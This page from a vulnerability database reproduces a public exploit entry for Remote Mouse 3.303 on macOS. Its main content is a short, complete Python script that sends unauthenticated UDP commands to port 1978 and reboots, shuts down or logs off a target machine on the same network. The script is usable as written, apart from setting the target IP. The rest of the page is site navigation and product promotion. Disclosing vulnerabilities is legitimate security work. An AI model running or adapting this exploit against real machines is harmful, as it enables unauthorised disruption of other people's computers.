Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Remote Mouse 3.303 Unauthenticated Remote System Control

🗓️ 24 Jul 2025 00:00:00Reported by Chokri HammediType 
packetstorm
 packetstorm🔗 packetstorm.news👁 123 Views

Remote Mouse 3.303 on macOS allows unauthenticated remote power control via UDP port 1978 to reboot, shutdown, or log off.

Code
# Exploit Title: Remote Mouse 3.303 - Remote Power Control
    (Shutdown/Reboot/Logoff)
    # Date: 24/07/2025
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://www.remotemouse.net
    # Software Link: https://itunes.apple.com/app/remote-mouse/id403195710?mt=12
    # Version: 3.303 (MacOS)
    # Tested on: macOS 14.4
    
    
    '''
    Description:
    
    Remote Mouse 3.303 (macOS) is vulnerable to unauthenticated remote power
    control due to weak access restrictions on UDP port 1978. An attacker on
    the same local network can send crafted packets to remotely shut down,
    restart, or log off the target system without requiring authentication.
    '''
    
    import socket
    
    def send_udp(payload, ip, port=1978):
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.sendto(payload.encode(), (ip, port))
    
    def exploit(ip):
        options = {
            '1': ('mpr0011', "Reboot"),
            '2': ('mpr0012', "Shutdown"),
            '3': ('mpr0013', "Log off"),
         #   '4': ('mpr0014', "Hibernate")
        }
    
        print("Select operation:")
        [print(f"{k}. {v[1]}") for k,v in options.items()]
    
        while True:
            choice = input("> ")
            if choice in options:
                send_udp(options[choice][0], ip)
                break
            print("Invalid choice")
    
    if __name__ == "__main__":
        exploit("192.168.8.103")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Jul 2025 00:00Current
7.5High risk
Vulners AI Score7.5
remote mouseunauthenticated accessremote power controlmacintosh operating systemport 1978
123